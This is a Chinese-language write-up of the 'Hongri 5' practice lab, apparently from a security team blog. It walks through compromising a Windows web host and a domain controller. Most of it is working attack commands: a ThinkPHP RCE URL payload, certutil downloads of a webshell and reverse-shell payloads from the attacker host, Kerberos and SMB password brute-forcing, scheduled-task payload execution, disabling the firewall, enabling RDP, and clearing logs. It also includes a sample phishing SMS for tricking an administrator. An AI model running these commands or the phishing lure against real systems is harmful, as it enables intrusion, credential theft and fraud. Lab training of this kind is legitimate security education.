红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

谢绝捷径的诱惑，文字才能拥有直抵人心的力量

简介

"红日5"是一个高度仿真的内网渗透实战靶场，模拟了企业级内外网混合环境。靶场包含外网Web服务器（Windows 7）、内网域控服务器（Windows Server 2008）双重网络隔离场景，涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场，学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、社会工程学、Pass-the-Hash等APT攻击手法，并深入理解企业内网安全防护的薄弱环节。

最近红日官网已恢复正常访问，如果懒得一个一个转存可以直接拿我的，一共500G左右，下载还请预留好一定的空间通过网盘分享的文件：红日靶场

链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: uze8

环境配置

设置好仅主机的vm2，138网段，然后我的nat模式网卡是135网段模拟公网

这个靶机呢一共有两个，

外网主机win7，设置好仅主机模式和nat模式两个网卡

内网域控服务器

win7

sunheart 密码：123.com

sunAdministrator 密码：dc123.com

2008（登录成功后要修改密码）

sunadmin   密码：2020.com

最重要的，需要在win7主机phpstudy开启web服务

网络拓扑结构，画的很潦草，看看就好

外网信息打点

利用arp-scan进行主机探测

arp-scan -l

利用nmap对目标主机进行端口扫描

nmap -sS 192.168.135.150 -p- -A

目标机器开启了80、135和3306数据库远程，mysql远程测试，拒绝连接

┌──(root㉿kali)-[~]└─# mysql -uroot -h192.168.135.150 -pEnter password:ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.135.128'isnot allowed to connect to this MySQL server

查看web站点，可以看到这是一个thinkphp框架

随便访问一个不存在的页面，发现指纹信息，5.0.22版本

寻找exp

searchsploit 5.0 thinkphp

已知我们的版本为5.0.22

searchsploit -m 46150cat 46150.txt | grep 5.0.22

拼凑EXP，执行命令whoami，成功利用

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

查看当前目录

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=chdir

使用generate生成混淆的webshell，不容易被查杀

weevely generate cmd shell.php

从kali下载webshell

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=certutil -urlcache -split -f http://192.168.135.128:5000/shell.php

kali连接webshell

查看内网IP，发现内网网段

ipconfig

利用arp进行主机探测，发现域控主机192.168.138.138

arp -a

开始代理reGeorg，详细使用方法<a "https:="" href="https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247498989&idx=1&sn=a860e19fe2d20c9b8aa5cc9ca81ac488&scene=21#wechat_redirect">三种代理方法打入内网

certutil -urlcache -split -f http://192.168.135.128:5000/tunnel.php

访问网页，发现直接报错，可能不适用windows了

那么切换frp，查看一下配置文件，注意这里是windows的frp，我用的版本是0.39.1，去github翻一翻历史版本的，新版本可能会出问题

上传到靶机上面去，有两个文件，一个程序一个配置文件

然后修改服务端的代理配置

vi /etc/proxychains4.conf

使用proxychains打开MSF，利用永恒之蓝漏洞，打域控靶机，这里失败了

proxychains msfconsolesearch ms17_010_eternalblueuse 0set rhosts 192.168.138.138run

这个时候我们就可以使用端口扫描进行信息收集（连接某些未开放端口的时候可能会显示超时，这是正常现象，继续等待即可）

use scanner/portscan/tcpset RHOSTS 192.168.138.138run

不使用msf也可以使用nmap

proxychains nmap -Pn -sT 192.168.138.138

查看域信息sun.com

whoami并不是超级管理员也不是系统用户，这下我们就需要提权了，只有上升到系统权限才能使用mimikatz抓取hash

注意使用x64模块，不用msf的话也可以上传nc反弹shell

# kalimsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=2222 LHOST=192.168.135.128 -f exe -o shellx64.exe# 靶机certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe

进入msf

use multi/handlerset LHOST 192.168.135.128set lport 2222set payload windows/x64/meterpreter/reverse_tcprun

尝试使用msf的getsystem进行提权

创建一个监听器，用于上线靶机（同理可以用nc来上线）

我们生成一个可以上线CS的exe程序

生成到d盘中，并传到kali中

scp .beacon.exe [email protected]:/data/windows_atk

并使用msf的upload上传此文件

upload /data/windows_atk/beacon.exe C:\phpStudy\PHPTutorial\WWW\public\beacon.exe

执行木马

上线cs

设置延迟执行命令 sleep 0 之后，就可以开始提权了

尝试了各种操作后，都普通用户提权失败

那么能怎么办呢——域内爆破，网上很多教程都是直接登录的administrator用户，直接用CS提权成功（上线的时候就是administartor），并没有完整的复现出来从一个最普通的用户上升到系统权限的教程，本篇文章也没有复现出来，复现过程可以参考一下

信息收集，域内用户，由于当前用户是普通用户，普通用户无法直接获取域内的用户列表

shell net view

换思路，域内不行，那就本机用户，可以看到有一个administrator用户

shell net user

那么这个用户也可能是域内的管理员用户吧？我们可以利用msf的kerberos_enumusers爆破 Kerberos 服务（88 端口，前面端口扫描的时候扫出来）

proxychains msfconsoleuse gather/kerberos_enumusersset DOMAIN sun.comset RHOSTS 192.168.138.138set USERNAME Administratorset PASS_FILE /data/SecLists_Dict/Passwords/darkweb2017-top1000.txtset THREADS 4run

成功爆破出来用户密码为dc123.com

注意：如果不用CS那么可以利用 hydra 进行爆破

proxychains hydra -l Administrator -P pass.txt   -s 445 -t 4 -vV -m "SMB"  smb://192.168.138.138

我们尝试使用其他用户上线呢

我们尝试使用其他用户身份上线

以本地用户登录失败，那么就切换到域控服务器

需要让我们输入密码，但是msf上线的不是交互式shell

连接并查看域控，也失败

使用PsExec模块攻击域控，失败！

proxychains msfconsolemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.138.138# 域控IPmsf6 > set SMBUser Administratormsf6 > set SMBPass dc123.commsf6 > set SMBDomain sun.commsf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp  # 内网直连msf6 > run

试了很多方法都不行，最终以失败告终，无法登录到域控服务器/切换本地用户，或者本地提升到Administrator用户。那么就剩下最后的办法了，社工！(诈骗案例分析，请勿用于违法用途，所造成的后果自行承担)

最近张伟管理员发了一条微博：”周末加班部署新防火墙，累成狗🐶”，

并且利用一定手段获取到了手机号。

【xxx科技IT部】紧急：OA系统漏洞需立即处理，请查收邮件并登录修复平台。确认后请回复“已处理”。

到了周末，管理员成功登录了系统，启动了phpstudy这个web服务，此时即可上线

kali连接我们的后门

weevely terminal http://192.168.135.150/shell.php cmd

运行我们的木马即可上线成功

设置svc-exe提权方式

已成功上线系统权限

抓取本地密码hash

此时就能看到密码信息了

查看域内用户

shell net user /domain

使用代理转发功能

创建一个监听器

生成需要上传到域控主机上的木马

从本机上传上去

certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe

放行4444端口

shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444

开始将马上传到目标服务器

shell net use \192.168.138.138ipc$ "管理员密码" /user:administratorshell net useshell dir \192.168.138.138c$ # 查看域控主机目录# 将马上传到域控服务器shell copy C:phpStudyPHPTutorialWWWpublicwin7beacon.exe \192.168.138.138c$win7beacon.exe

创建执行任务，提示了我们拒绝访问

sc \192.168.138.138 create shell binpath= "c:win7beacon.exe"

那么就用另外一种方式 at ，添加一个计划任务

shell at \192.168.138.13822:10:00 c:win7beacon.exe

耐心等待一分钟既可上线，而且还是最高权限，拿下域控主机

关闭防火墙

shell netsh advfirewall set allprofiles state off

修改注册表允许远程连接

shell reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

放行3389端口

shell netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP

查看用户密码

修改代理文件，并重启frp服务

本机windows打开代理工具

可以看到我们已经能够正常访问域控主机了

刚进去是登录错误的，我们重新输入账号密码，登录到域sum.com

成功拿下域控服务器！

最后清理日志即可

至此红日5完成

deepseek总结(部分修改)

攻击路径全景

1. 外网突破
   • 通过 arp-scan + nmap 探测开放80/3306端口
   • 利用ThinkPHP 5.0.22 RCE漏洞（ /index/thinkapp/invokefunction ）
   • 上传混淆Webshell（Weevely）实现持久化控制
2. 内网渗透
   • 发现双网卡结构（NAT+Host-Only）及内网段192.168.138.0/24
   • 使用 frp 搭建Socks5代理穿透内网边界
   • 通过 proxychains + nmap 扫描域控（192.168.138.138）暴露445端口
3. 权限提升
   • MSF生成载荷上线失败后，通过CS的 svc-exe 提权获取SYSTEM权限
   • 利用 mimikatz 抓取本地管理员凭证（Administrator:dc123.com）
4. 横向移动
   • IPC$共享+计划任务（net use + at）投递Beacon载荷
   • 绕过防火墙放行端口（netsh advfirewall）
   • 通过RDP（注册表修改fDenyTSConnections）接管域控桌面
5. 权限维持
   • 域控主机部署多协议后门（MSF+CS双链路）
   • 清理日志（clearev）隐藏攻击痕迹

关键技术点

• 漏洞利用：ThinkPHP RCE漏洞的EXP构造与混淆Webshell上传
• 隧道搭建：Frp代理穿透双网络隔离环境
• 权限提升：CS的svc-exe提权与Windows服务劫持
• 横向移动：基于SMB的载荷投递与计划任务执行
• 域渗透：Pass-the-Hash攻击与黄金票据伪造

防御启示

1. 外网防护：及时更新框架补丁，禁用危险函数（如 system ）
2. 权限控制：遵循最小权限原则，限制数据库远程访问
3. 网络隔离：严格ACL策略，阻断异常出站流量（如Socks隧道）
4. 日志审计：监控计划任务创建、注册表关键项修改等可疑行为
5. 域安全：启用LAPS管理本地管理员密码，限制域管登录范围

报告编制方：泷羽Sec安全团队日期：2025年2月21日